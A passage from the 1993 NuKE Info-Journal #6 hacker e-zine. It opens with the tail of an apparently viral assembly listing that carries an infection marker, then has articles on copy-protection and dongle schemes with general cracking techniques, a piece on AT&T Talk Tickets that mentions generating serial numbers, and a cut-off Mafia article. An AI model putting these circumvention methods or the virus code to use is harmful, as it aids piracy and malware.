db 090h,090h ; E (14) SS reg from start in para.
db 090h,090h ; 10(16) SP reg at entry
db 090h,090h ; 12(18) checksum
db 090h,090h ; 14(20) IP reg at entry
db 090h,090h ; 16(22) CS reg from start in para.
Marker db 0DBh,0DBh ; Marks THIS File as INFECTED!
last:
seg_a ends
end start
================================================================================
===============================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "The Arms Race on Disk-Based Protection -N
E- Methods : Round One" Nu
-N uK
Nu By KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% The `Arms Race' on Disk-Based Copy Protection Methods : Round One %
Disk-based techniques of protecting software have existed since the early
days of microcomputers. The very first microcomputers used cassette tapes
to store programs and data. (Remember the C-64s old days?) The first mass-
market microcomputer to use disk drives instead of cassette tapes was the
Apple-II in 1978. Its great popularity was largely due to its reliable
and inexpensive disk drive system, devised by Steve Wozniak. The disks,
much faster and more convenient than cassettes, in turn made it practical
to run large and complex programs. Disks became standard equipment on all
but the cheapest microcomputers. The tremendous success of the IBM PC
microcomputer in the early 1980s confirmed this trend.
The history of disk-based protection methods and the of efforts to defeat them,
resembles an escalating arms race, and hence the name. Early, elementary
protection techniques were countered by skilled users, some did it for their
own convenience, others for the intellectual challenge. And hence, the
arms race began. The `guerrillas' of the arms race were the `software hackers':
mission; to device a method for removing `cracking' the copy-protection of
each new program marketed, and who then distributed the copy-able version to
their friends, who passed it on, and so on.
I have witnessed and was quite an active member of this arms race, the
intellectual challenge was the main reason of my membership. During the
years I have come upon several protection techniques some I was able to
easily bypass, and others that brought upon great challenge. Slowly I
began noting the several methods of disk-based copy-protection, and I also
did acquire several documents on other disk-based copy-protection, and today
you will read upon this very interesting concept of disk-based copy-protection.
Some methods were quite frightening as it tried to perform dangerous disk-
access techniques. Some methods were quite trivial, others were loops and flaws
of the disk structures, and how the disk controller reacts. All the methods I
was able to collect are documented bellow, a lot of time and effort was put
into this, I do hope you appreciate it.
% Disk Format %
The early generation of disk protection methods depended on technical details
of the diskette and disk drives. To describe the methods, it is first
necessary to outline the structure of a formatted floppy. For convenience I will
only use the IBM PC 5.25 inch disk, formatted by the popular PC-DOS or MS-DOS.
Information is stored on the disk in a series of circles, called `tracks'. In
a normal 5.25 double density disk you have 40 series of circles, aka tracks.
Tracks are numbered from 0, being the outermost track, to 39 being the inner-
most. Each track is divided into 9 arcs, called `sectors', numbered from 0-8.
Each sector consists of an `address field', which identifies the sector, and
a `data field', which contains the data stored in that sector. Both fields
contain a prologue, data, a checksum and an epilogue, of the information stored
in that field. Therefore, in reality DOS does NOT make the total number of
possible bytes available for your data storing. In a 5.25 DSDD (double sided,
double density) disk there really is a possible of 500k where only 360k is
available for you. In a 5.25 DSHD (double sided, high density) disk, there
is 1.6 Megs, but only 1.2 Megs is available to you. In a 3.5 DSDD disk, there
is 1 Meg, but 720k is available for you. In a 3.5 DSDD disk, there is an
amazing 2.0 Megs but only 1.44Megs is available to you.
The same applies for hard drives, ever buy a HD and it says 120 Megs, but when
you format it, you only get 114 Megs? Its because of DOS, there are some
programs that enable you to use this space and get rid of the address field,
that is present before _every_ sector. One popular program is called
"MAXI - Form" by Herne Data Systems Ltd. This program allows 360k floppy to
hold 420k, 720k -> 810k, 1.2M -> 1.44M, 1.44M -> 1.66M. Maxi CANNOT make use
of ALL the possible number of bytes, because we MUST reserve some space for
the Boot Sector, 2 copies of the FAT and the DIR Structures. However it does
rid the address fields, and is compatible with DOS with the help of a TSR
program that `fools' DOS in thinking that it was structured correctly.
Now, when you `boot' off a diskette, a copy of DOS _MUST_ reside on the outer
few tracks of the disk. Another Track is reserved for the file directory. When
the computer is turned on, a process occurs, called `booting'. The IBM PC
does not contain a built-in DOS. Its ROM contains just enough information
to enable to find and read sector 0 of track 0 of the disk, which is the boot
sector. That sector contains a program to read a few more sectors, which in
turn contains a program to read the entire DOS into memory.
% Sector Format %
The majority of floppy disks are `soft-sectored', meaning that the software
must be able to locate any given track and sector with no help from the
hardware. On a `hard-sectored' disks there is a physical marker, such as a
small index hole, that tells the hardware precisely where each track and
sector is physically located. On the soft-sectored disk the software
searches for the desired sector by a trail-and-error process, reading the
sector's address field until it finds the sector it wants. This certainly
takes a little longer, but allows much more flexibility, since the sectors may
be placed anywhere the DOS likes. Anyhow floppies are usually soft-sectored,
but IBM 5.25 inch and 3.5 inch diskettes contain physical markers. Hard Disks
usually tend to be soft-sectored, but that was only on the MFM, RLL Hard Drives
the IDE, and SCSI drives are hard-sectored, that is why we have a _major_
access time. MFM,RLL range at 50-70ms (milliseconds) IDE,SCSI tend to range
from 8-15ms.
% Copy-protection Method #1 : Disk Appearance %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
% Unformatted Tracks %
The simplest protection against disk copier utilities was to include a blank
(unformatted) track or sector on the disk. The disk copy utility will fail at
that track and copy nothing further. This was probably the first kind of whole-
disk copy protection introduced.
% Non-standard DOSes %
Although the disk cannot be copied, it will still boot and run properly as
long as the DOS does not attempt to access the unformatted track. This can
be easily be prevented by using a modified version of the normal DOS. When
a disk is booted, the DOS on the disk replaces any that may have been in RAM.
It can have any modifications the author pleases. The only requirement is that
the modifications to the DOS must correlate with the modifications to the disk
format. Some of theses methods are listed bellow.
a) Altered track/sector count
The number of tracks per disk and sectors per track are usually chosen
to provide maximum data storage per disk. There is no reason why lesser
numbers cannot be used. For example we could create an IBM disk with
only 7 sectors per track or 30 tracks per disk. And with a sightly more
complex DOS modification the number of sectors could vary from track to
track.
b) Altered sector size
A normal sector on an IBM PC disk always contains 512 bytes of user data
as its payload. It is easy to alter the DOS to expect a different number
of bytes per sector. In some cases, huge sectors have been used that fill
an entire track.
c) Altered track/sector numbering
Each sector on a disk has an address field containing its track number
and sector number. The DOS checks this before reading the track. Instead
of numbering the sectors on a track from 0 to 9, one could number them
from 70 to 79. The 40 tracks, likewise, could have bizarre numbering,
say the first 40 prime numbers.
d) Altered checksums
Each sector contains a byte which is a checksum of the data contained in
that sector. It is calculated by performing an eXclusive-OR (XOR)
operation across all the bytes in the sector. The DOS recalculates the
checksum each time it reads a sector, and compares its value to the one
actually stored in the sector. If they differ, the DOS assumes that it
read some byte(s) in the sector incorrectly. One can protect a disk by
using a different algorithm for calculating the checksum to be stored in
each sector. Of course the disk's own DOS uses the same algorithm, and so
agrees with the stored checksums, but standard DOS thinks it has read
each sector incorrectly, and will retry up to 5 times, and once all 5 test
fail it will report the message "Bad CRC Data...." error message.
e) Half-Tracks
The newer half-height floppy drive were quite advanced, as a matter of
fact they were capable of stepping to positions half-way between the
normal track position. These half-track positions are not ordinarily
suitable for recording data, because they are so close to the normal
track that there would crosstalk. (Meaning signals would spill over from
the normal tracks to the half-tracks and vice-versa. On the other hand,
the half-tracks can be used it the normal tracks are left unused. For
instance a disk could use track 0, 1.5, 2.5, 4, 5, etc. A normal copy
program will miss all the half-tracks.
% Nibble Copy Programs Fight Back %
In response to the above protection techniques, computer hobbyists began to
write and circulate special copy programs known as `Nibble Copiers'. These were
passed gratis along the grapevine of hobbyists. The first commercially
advertised bit copier was `Locksmith' by Omega Microware of Chicago at around
1984. The first version of Locksmith was slow but reliable, and was able to
cope quite easily with all the copy-protection methods described above. Within
a year other company programs appeared, like Copy-Write, Copy-II-PC and
E.D.D., but Locksmith remained the most prominent until Omega Microware
collapsed near 1985-86.
A bit copier makes as few assumptions as possible about the format of the disk.
It does not assume any particular number of sectors pet track or tracks per
disk, or any particular number of sectors per tracks per disk, or any other
possible sector alteration. This is something DOS was never able to do. Bit
copiers read each track, and attempts to reproduce what it finds exactly on
the destination disk, bit for bit. Error checking is performed by reading the
track several times over and comparing the data. Completely unformatted tracks
were identified and ignored.
% Spiral Tracking %
This is probably the ultimate in format alteration, and the last to be
developed. This method was actually very clever. The way the data was
structured on the diskette, actually `looked' like a spiralling pattern.
The floppy drive heads would travel a small arc starting from the outer
track, then jump to the next track (or half-track) and immediately travel
another small arc, then jump to the next track, and so on. The resulting
series of arcs resemble a broken spiral, hence the name. So instead of track
1 being the outmost ring, it would spiral towards the innermost track. This
type of protection is quite difficult for a bit copier to overcome, since it
depends on the accurately synchronized copying of partially formatted tracks.
Unformatted areas of tracks contain magnetic signals of intermediate values,
bits neither 0 nor 1. Therefore it was extremely difficult for the bit copier
to identify all those portions of the track that can be copied correctly. One
major serious problem with spiral tracking is that it depends on precise
timing of events. It the disk drive is rotating a bit too fast or slow, or is
slightly misaligned in other ways, the protected disk is likely to fail.
% Slow Drives %
Another protection technique used in combination with some of the above methods
is to record the protected software using a disk drive turning SLOWER than
normal. When data is recorded on a track passing slowly under the head, more
data per inch than normal is recorded. This makes it possible to record more
data on a track than would normally fit. Therefore if the user would try to
copy the software with a regular drive, the destination disk will complete
a full revolution before all the data is copied, and the tail of the track will
overlap and destroy the head of the track on the destination disk.
% Copy-protection Method #2 : Signatures %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
As we could see the protection wars, escalation proceeded rapidly. The methods
described above were all `format alteration methods. They use a non-standard
disk format that is not recognized by standard copy programs, but copy-able
by the bit copiers. So a new method was introduced, a signature, which was any
minor feature of a disk that serves as an identification mark to verify that
the disk is an original. To be effective, a signature must be a feature that
is not properly duplicated by a copy program, including bit copiers.
% Innermost track %
Probably the first signature protection method was the use of an extra track.
A normal IBM disk uses 0 to 39. The disk drive is in fact capable of stepping
the head to an extra innermost track, track 40. (and sometimes to track 41)
The innermost track is normally unused because of reliability problems. A
protected program may format this track and use the fact that it is formatted
as a signature to verify that the disk is an original. It may even keep some
portion of itself (eg the disk directory) on the innermost track. An ordinary
copy program will overlook this track, and a bit copier will only copy it if
specifically instructed to.
% Check for write-protection %
An ancient and crude signature method is to issue original disks with the
write-protect notch covered. The program would try to write to the disk, if
the write operation succeeds, the program can assume that the user made a
duplicate disk and refuse to execute.
% Bit Counting %
It is _very_ difficult to get two disk drives to turn at precisely the same
speed. Any characteristic of a disk that depends critically on the speed of
the drive on which is was recorded will make a good signature. For example,
when a disk is formatted, there is always some empty spaces remaining on each
track between the end of the last sector and the beginning of the first sector.
The formatting program fills this space with meaningless bits. The size of the
space, and therefore the number of bits, and therefore the total number of bits
on the track, depends on the rotational speed of the disk drive. If the bits
are counted, and the count is recorded somewhere else in the disk, the software
can compare the number of bits to the count every time the disk is booted. If
a duplicate is made on a different drive, the duplicate disk will have a
different number of bits on that track, and the count will fail. Even small
variations in the speed of a single drive will cause different disks made
on that drive to have different numbers of bits per track, so that each disk
has a different signature.
This is an _extremely_ difficult protection method for bit copiers to overcome.
Some version of Locksmith included a utility to prompt the user to adjust the
speed of the drive (by turning a vernier with a screwdriver) until it matched
the apparent speed of the drive on which the original disk was recorded.
However, E.D.D. (Essential Data Duplicator) used a variable timing loop to
vary the rate at which the bits are recorded on the destination disk, to
compensate for the speed of the destination disk drive. These methods required
a great deal of trial-and-error to make satisfactory duplicate disks.
% Deliberately Damaged Media %
This method consisted of deliberately damaged media; a disk which is damaged
in a predictable way that can be detected by the software. The damage serves
as a signature. An example is the `Prolok' systems by Vault Corporation. Prolok
is a special disk sold to software companies, to publish their programs on. The
disk included software that may be adapted to work with any application program
the software publisher records on the disk. The signature is a small hole, cut
by laser, in the recording surface of the disk. The Prolok software can detect
this hole because it is an area on which no data can be recorded, bad sector.
Prolok is actually quick easy to defeat for a programmer. The technique
was to insert a small TSR program hooked to int 13h, and it would review
all requests by programs to the DOS. If Prolok asks the DOS to read the area
of the disk where the hole is, the TSR captures the request and forges a
reassuring response. There was also a pubic domain program specifically
designed to defeat Prolok, called FUProlok.
In general ALL these disk-based copy-protection had one major flaw, they all
had some easy pattern that would enable us to defeat them easily. The pattern
was the usage of Int 13h, the knowledgable `cracker' would construct a simple
generic TSR that would hook Int 13h, that would create a break-point (Int 3h)
whenever the interrupt was called. From there the knowledgable cracker could
trace through the code, and see if the information obtained by the Int 13h
was used in a peculiar method. Most programs are written in a high level
language so the use of Int 13h is not common therefore get to the bottom of
the Int 13h
% Difficulties of Disk-based Copy-protection %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The major obstacle of disk-based copy-protection was a hard disk.
Hard disk users were not content to run programs from the floppy disks, they
almost insisted on transferring the software to the hard disk. One solution
that was adopted was for the program to execute itself from the hard disk,
but to also require the floppy to be left in its drive. The floppy was usually
referred to as a `key disk', which was periodically checked to validate the
signature.
The major problem was that it didn't allow the user to have access to his
floppy drive while using the hard disk. Another bad side effect was that it
prevented users connected to a network, in executing more than one copy
at the same time, as you only had one copy of the `key disk' to go around.
And all of the `format' methods examples cannot be used on a hard disk. In
general you cannot tamper with the structure of the hard disk, because it
may contain several hundreds different applications. Also the interface
system does not give the host computer direct control of details like
the number and arrangement of sectors per track or count of bits on a track.
================================================================================
�================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "The `Arms Race' on Physical Protection -N
E- Devices : Round Two" Nu
-N uK
Nu By KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% Physical Copy-protection Devices %
A physical protection device is usually a piece of equipment to a computer
or used in conjunction with a computer to protect software or data. The
majority of such devices are commonly referred to as `dongles', which are
electronic devices attached to the computer.
When a dongle protection is used, no attempt is made to prevent the user or
owner of the package from creating additional copies of the software. The
device is designed to prevent unauthorised use and not unauthorised copying.
The origins of the word `dongles' is obscure, but it originated about 1978-79
and is believed to have been first used to protect the `Wordcraft' package
on the Commodore Pet.
% Dongles - A Simple Dongle Design %
The first problem in designing a dongle is finding some method of attaching
the device to the hardware. It must be a method which is available on the
standard minimum configuration machine for which the software is intended to
run. The _most_ obvious choice is the serial interface port of which nearly
every machine has at least one, especially with the increase use of mice and
modems which require serial connections. Assuming further that we do not wish
to use this port during the running of the program, then a very simple dongle
could be constructed using the standard cabling and reverse channel so that
communications are usually made in both directions simultaneously. The wires
would have the following functions:
Sending Channel
~~~~~~~~~~~~~~~
Request to send (Output when the computer is ready to go)
Clear to send (Received when the terminal is ready)
Transmit data (Line for the computer to transmit the data)
Receiving Channel
~~~~~~~~~~~~~~~~~
Data Terminal Ready (Output when the computer is ready to receive data)
Data Set Ready (Received when the terminal is ready to transmit)
Receive Data (Line for Computer to receive the data)
Carrier Detect (Line for modem to signal the computer that
(another modem signal has been found via telephone)
Ring Detect (Line for modem to signal the computer that a)
(ringing tone has been received)
Assume that wires are used to connect the signals as shown below:
Standard output Standard inputs
~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~
Transmit data..........Data Set Ready
Request to send........Receive Data
Data terminal ready....Ring Detect
This is a bizarre combination, which is extremely unlikely to be used by
design with any sort of equipment. To protect our dongle we further seal
the plug casing with pitch or epoxy resin so that the details of the wiring
cannot be seen without melting out or drilling away the resin.
The representation of a `U' character in the standard ASCII code will appear
as a square wave. This is because the character itself has the binary value
0101 0101, and, taken with the character beginning pulse (start bit) and the
character ending (stop bit), this makes up a square wave signal 1 0101 0101 0
+6v-+ +-+ +-+ +-+ +-+ +-+ Now, Transmit a stream of `U's, since Transmit is
| | | | | | | | | | | connected to Data Set Ready, this will go up and
0 | | | | | | | | | | | down, at intervals of one bit. By Sampling this
| | | | | | | | | | | line the program can test that the correct pattern
-6v +-+ +-+ +-+ +-+ +-+ +- is being transmitted and received. This means the
dongle is in place. This is a perhaps a dongle suitable for the computer
hobbyist, it rather is quite a poor attempt as a dongle. This is because of
several reasons; it does not allow the use of the serial port because it is
needed for the dongle, therefore a mouse or modem or printer connection via
the serial port can not be done if you only have one serial port.
% Advanced Pseudo Random bit Generator Dongles %
Two new devices being marketed to software homes are Datakey (DES, 1988) and
Software Key (Bristol, 1988). The overall concepts of both are similar, and
they were in fact developed by the same inventor, although the two structures
are quite separate and the details of the devices differ alot.
The devices are `active' dongles. Meaning one end of the dongle plugs into the
computer, and whatever is normally connected to the RS232 port is connected to
the other end, and should be unaffected by this device.
In the Datakey, which is a bit oriented device, toggling the Data Terminal
Ready line causes a single bit of data to be presented at Data Set Ready or the
Data Carrier Detect Line. By this means, a string of pseudo random binary data
of any length can be read out of the device. Assembly language routines are
included with the device for linking into the software to be protected.
In the Software Key, special command codes are used to trigger the device,
which responds with a byte of pseudo random data. Such sequences only repeat
after an extremely large number of operation.
% Software Sentinel %
The Software Sentinel (Sentinel, 1988) plugs into the parallel printer port of
an 80x86. The parallel channel was preferred to the serial channel since the
parallel channel is always present on many systems, even with minimum
configuration. However Sentinel also have a serial port version of this device
called the Sentinel S.
% Dongle Cracking %
~~~~~~~~~~~~~~~~~~~
Some exports are scornful of the protection afforded by dongles. Some even
boast that 30 minutes would usually be sufficient to bypass any dongle
protection in any program. As a matter of fact dongle cracking is actually
straight forward, simply find the routine that accesses the dongle test. The
difficulty of this job is really based on the software used to access the
dongle. If the software accesses the parallel/serial port via interrupt
functions, a simple TSR program can be stated to `fool' the program that a
dongle is present, or simply trace through the code from that point on to
see what actually happens, and what the program expects to get back. However
I do not expect a program to use interrupts to access an I/O port for the
sole reason of easily breaking in via the vector table. Chances are the
software is accessing the I/O port directly with the built in processor
instructions (OUT/IN). So it will be up to the user to disassemble the
program to search for IN/OUT or INS/OUTS or INSB/OUTSB or INSW/INTSW
instructions that will access the parallel/serial ports. Once you locate
the routine that accesses the port, you may either reverse engineer or set
a break-point and attempt your journey of debugging.
Nevertheless, this does not nullify the credablity of dongle protection.
As a matter of fact several new software are using dongles to protect
their software. But the fact remains, no software is 100% secure. Dongles,
require software to `test' that the dongle is attached, therefore the
possibility of finding the `test' routine exists, and therefore modification
is possible.
% Lenslok % The Latest Physical Protection Device %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Lenslok device was also designed for the low cost software end of the
market. The device consists of a plastic lens device rather like a pocket
magnifying glass. It contains a series of prisms which cause anything viewed
through it to be seen as a confused jumble of different dots. (pixels)
Figure #1 Figure #2
1 2 3 4 5 A B C D E
????????????????????? ????????????????????? The letter `A' normally looks
? ? ? X ? ? ? ? X ? ? ? ? ? like the pattern in figure #1.
????????????????????? ????????????????????? Scrambled, it could look like
? ? X ? ? X ? ? ? ? X ? ? X ? ? the pattern shown in #2. All
????????????????????? ????????????????????? that was done was that column
? X ? ? ? ? X ? ? ? ? X ? ? X ? 1 & 3 were interchanged. So if
????????????????????? ????????????????????? we took column A & C and swapped
? X ? ? ? ? X ? ? ? ? X ? ? X ? them, we would get the
????????????????????? ????????????????????? charactor `A' once again.
? X ? X ? X ? X ? X ? ? X ? X ? X ? X ? X ? Then the Lenslok would consist
????????????????????? ????????????????????? of a simple optical system,
? X ? ? ? ? X ? ? ? ? X ? ? X ? which consists of two shallow
????????????????????? ????????????????????? angled grooves cut into the
? X ? ? ? ? X ? ? ? ? X ? ? X ? plastic which change over the
????????????????????? ????????????????????? columns.
So, the user would apply the `lens' to the screen, over the jumbled pattern
of dots and presses a key until the pattern appears through the prism.
Therefore, in a Lenslok protected system, you may have a word, scrambled,
which the system may ask you to respond to, whereby you would take the lens,
and pass it ontop of the charactor and voila.
% Cracking all together now... %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lenslok, is a great physical copy-protection, it is low-costing, it can be
used inconjuction with the current `Document Protection' currently widely
used in several low-cost software, expecially in home entertainment computer
games. Document protection, is whereby the program, mainly in the beginning,
will stop for a moment and ask you a question, whereby the answer is only
to be found in the documents supplied with the original package. Nevertheless,
document protection, is fairly weak, as documents can be easily photocopied.
It can also be scanned as a computer image, and can be easily distributed,
through computer modems, into the computer BBS scene.
So to an extent Lenslok can help document protection, as a lens is not easily
copied by your average computer hobbyist. So even though a copy of the
documention is made, how are we to know what exactly it (the software),
is asking us for?
All together now, _ALL_ protection schemes developed now, can be broken, may it
be, Lenslok, dongles, disk-based protection schemes. This is due to the reason
that all protection schemes have to use some sort of software that will `test',
and decide if this is an authorised copy or not. The fact of the matter is,
that their is a terrible weak spot. Software protectors have developed
_amazing_ protection schemes, the `front' of the protection is almost
unbreakable. Emagine a castle in medival times, with a moat around the castle,
the moat contains deadly man-eating animals, the front of the castle also have
men waiting with boiling oil to throw over you, there is also several men with
bows and arrows awaiting to kill you. Now, how effective is this, if somebody
leaves the back gate unlocked? Sure, it may be nearly impossible to get through
by the front, but the back gate is unguarded. The same applies for copy-
protection, whereby the fact of the matter is, that nobody has done anything
about low-level entry! Anyone capable of 80x86 structure assemble language,
can by-pass a copy-protection. The only problem is finding the routine, this
is a challenge within itself, it is rarely a just a CMP command. For some
reason NPC members think that CMP is all there is to look for! Aren't they
acomplished crackers?
Cracking involves alot of time, extreme knowledge on the 80x86, and a few
tricks of the trade. If a document check awaits you to type an answer, you
will need to set a break-point at that exact location. Ctrl-Break, will
_rarely_ work, so you will have to make tools of your own, that will allow you
to exit at the desired location. Protected software usually overwrite the
Int 3h, and Int 1h, to avoid break-points, you will have to devise your own
Break-point type program, perhaps one hooked to Int 9h, and at ALT-A it will
execute a Int 3h, and at the same time you will enter your debugger entry
point back to Int 3h. I would hook my TSR to Int 5h and on Print-Scrn it
would load the debugger. Many times, you would have to put a special routine
on Int 8h or 1Ch to make sure that your entry point is not erased at the
vector table, there's an unlimited number of possible combinations, I certainly
cannot name you them all. But what I can do, is give you the theory concept of
the protection scheme, and you can devise your own pleasable method. Many,
people enjoy reverse engneering jobs, some (like myself) take note of all
systems I/Os and Interrupts being called, and work my break-point from there.
But this two-part article was to give you an understanding on how some copy-
protection schemes work. The _only_ way one can attempt to defeat the
protection is to understand how the protection works. Then your attempts to
bypass it will be much more effective, rather than taking a non-effective
guess. Be direct, go directly to the source of the conflict, don't waste
your time on anything else. So I do hope this has been a learning experience
for at least some. If demand is there, in the following news journal we may
focus on effective cracking techniques, and some tricks and tips to avoid
falling into a ditch.
Rock Steady/NuKE
==============================================================================�================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "AT&T Talk Tickets" -N
E- Nu
-N uK
Nu By KE
uK Nowhere Man E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
Introduction
~~~~~~~~~~~~
As many people know, many countries throughout the world have begun
installing a new pay phone system which takes "phone cards" in addition to
or instead of coins. These phone cards are unlike U.S. calling cards,
rather they are more like credit cards: they have a magnetic strip which
holds the value of the card. You buy a card in a certain denomination
(say $10) and then you can place that amount of calls with the card. The
U.S., however, is unwilling and unable to impliment such a program.
(Remember, this is the country which brings you the English System of
measurement!) Not only would it cost too much, so they say, but there is
also a problem not found in most other countries -- competiton. Pay phones
may be owned by anyone, from the local phone company to the foreigner who
owns the local Duncan Doughnuts; to get everyone to agree to a standard and
to replace existing phones with card-ready phones would be unfeasable. So
now AT&T and U.S. Fibercom are introducing an alternative: "Talk Tickets."
What are Talk Tickets?
~~~~~~~~~~~~~~~~~~~~~~
Talk Tickets are not magnetic-striped cards or calling cards, they're a
strange cross between both. You'll be able to purchace a Talk Ticket in
certain demomination, each carrying a certain number of $0.60 "units."
Cards will be available in 5, 10, and 50 unit ($3, $6, and $30)
denominations. The card itself is a small cardboard ticket bearing a
unique eleven-digit serial number (and some rate/call information). You
call an 800 number and a voice prompts you for your ticket number. Once
you've entered a valid number, the voice will tell you how much money is
left on the ticket (you don't have to use the full value of the ticket on
one call, leftover time is kept track of). Then you place your call, just
as if you were dialing from a normal line, with a few exceptions: there
are special "star" services you can dial, recordings costing one unit each
(like 976 numbers), and international calls do not require the usual "011"
prefix. The call is then handled normally, however if your ticket runs out
of credit during the call you are abruptly disconnected.
Costs
~~~~~
As mentioned before, calls are billed in $0.60 units. The chart below
gives the cost, in units per minute, for calling various locations.
Area Units/Minute
~~~~ ~~~~~~~~~~~~
*1 (Sports News) 1
*2 (World News) 1
*3 (U.S. Weather) 1
Asia (incl. Australia and NZ) 5
Africa 5
Canada 3
Europe (except former U.S.S.R.) 4
Russia/Former U.S.S.R. 5
South America 4
United States (incl. AK and HI) 1
These rates are much higher than standard calling card or direct-dial
rates -- a call to Europe is $2.40/minute, Canada is $1.80/minute, and
Asia is a whopping $3.00/minute. This is cheaper than a coin call from a
pay phone, but other than that it's extremely expensive.
Where do I get Talk Tickets?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Right now Talk Tickets are available on a limited trial basis via
McDonald's. That's right, McDonald's. Three-unit Talk Tickets will be
given away free in Super-Value Meals until June; the catch is that it's a
limited trial offer, avaliable only in the following areas: New York City,
Buffalo/Syracuse, Baltimore, Pennsylvania, and Wisconsin. You can also get
them via Patrick Townson, moderator of the Telecom Digest on Internet
(ptownson@eecs.nwu.edu), for $2 per four units (or $1.50/card in groups of
ten or more). In addition, Talk Tickets should soon be on sale at AT&T
phone centers near you...
Important Numbers
~~~~~~~~~~~~~~~~~
The 800 Talk Ticket access number is 800-331-0888. For more information
about the Talk Ticket program, call 800-462-1818 (outside the U.S. call
408-428-2734 collect). The operator will be happy to answer your
questions about the Talk Ticket program.
Hacking Talk Tickets
~~~~~~~~~~~~~~~~~~~~
I'm sure the first thing you though of when you read about Talk Tickets is
"how can I abuse them." Well, there's really no reason to. First off,
the serial number is eleven digits -- however it's created algorythmically,
meaning it *can* be hacked. However, even if you do manage to generate
your own Talk Ticket numbers, its not of much value if you're calling
outside the U.S. You can get almost an hour within the country on a 50
unit ticket, but that same ticket would only get you about 12 minutes to
Europe or 10 minutes to Asia. You're better off not wasting your time,
calling cards are much better.
Conclusion
~~~~~~~~~~
SAVE YOUR MONEY. There is little reason to use the Talk Ticket program.
Calling card calls are much cheaper -- heck, even hotel surcharges are
usually less costly! In addition the potential for abuse is limited; the
most you can fraud would be 10 minutes to Australia, big deal. The one
key advantage, though, that the tickets offer is anonymity. You are just
a number, and unlike with a calling cards, you pay cash up front, and are
not billed directly, so your privacy is mantained. So, unless you need the
protection (and are willing to pay through the nose for it!) AT&T Talk
Tickets are a waste of time and money.
Nowhere Man/NuKE
===============================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Mafia, Incorporated." -N
E- Italy's underworld extends its reach Nu
-N uK
Nu By KE
uK The Godfather E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
Like any business bursting at the seams of its own success, the Mafia
and its allies know no borders. Born of a transatlantic axis, the Mafia
has forged alliances wherever it has needed to, sponsoring indigenous crime
syndicates or helping rivals to wipe each other out. The manipulation of the
Turkish heroin "Babas" or the drug barons of Colombia has become a model of
how to operate an empire to the conquering power's advantage. Internationally,
the Mafia is stronger than ever before, recent attempts of the crackdown show
it to be expanding with speed, in Russia and other post-communist countries,
buying up chunks of the economy, laundering money, dealing with local
gangsters, and preparing to create and cultivate an eager market for hard drugs.
The Mafia runs the world's drug-dealing business, and its wealth is
inestimable. The giddy profits from South America, the US, and the Far East
are laundered, recycled, and hidden by the best wizards in the money business
across an impenetrable labyrinth of `legal' commercial activities.
"They would do well to go to Havard Business School." says Leoluca Orlando, the
ousted anti-Mafia mayor of Palermo, Sicily. This statement is probably true,
however it may be hard to put to the test! Because to `protect' the empire, the
Mafia must kill. And however wide its intercontinental span, it kills mainly
on its own ground and at its nerve centre, where it has, until now, enjoyed
relative impunity: in Italy.
A bombing last year this time (May 1992) killed Judge Giovanni Falcone, one
of the few men _ever_ to momentarily check the squalid advance of the Mafia.
Mr. Falcone, was quoted as "The worlds _most_ wanted man!", wanted that is by
the Mafia. Mr. Falcone did contain assortments of documentation and knowledge,
on the Mafia structures, therefore possing a great threat to the Mafia, and
killed by the Mafia. After the killing of Mr. Falcone, who was one of the
world's _most_ protect man. Who, was to challenge the Mafia and continue Mr.
Falcone's work?
Two months later, a `fake' construction crew pretending to repair a segment,
of the highway, placed a bomb under that segment of the `repaired' road. The
bomb was set off just as Paolo Borsellino, passed underneath it in his limo.
Paolo Borsellino had _secretly_ taken over from Falcone as head of the
Anti-Mafia group in Palermo. How did the Mafia find out so quickly? The Mafia
contains extremely loyal men, in almost all levels of the government, and
someone tipped the Mafia that Mr. Borsellino was heading a new Anti-Mafia
government agency in Rome. With this simple message of triumphant monkery,
the Mafia confirmed that it will wage its latest, and potentially its
bloodiest, battle against Italian society with a sick blend of fury and cool,
diabolical arrogance.
This time the Mafia's violence is not between clans, nor is it the _usual_
picking off of inconvenient politicians and judges at intervals of years. This
time the offensive opposition and terrorizing a rebelling populace back into
submission. Following Borsellino's assassination, the Italian authorities
sent in troops for the first time against the Cosa Nostra. Nobody _ever_ dared
to go against the Cosa Nostra! The Cosa Nostra has grown from what was believed
to be a band of gangster operating out of the chaos of postwar Sicily, to
become, in 47 years, an unchallenged and unchallengeable global crime
syndicate. The officials and troops are shadowboxing, and judges have resigned,
saying that their work is pointless, their lives are undefended, and their
investigations are blocked from on high. The killers of Falcone and Borsellino
want to show that they can kill with impunity and that they are protected from
within the system.
Almost _every_ time the judiciary peels away the covers of Italian high finance,
construction, tourist development, local politics, or public-sector spending
excesses, it finds the Mafia. Every illegal arms deal and, of course, every
drug haul leads directly to the Mafia.
There seems to be no obvious explanation for its success other than ruthless
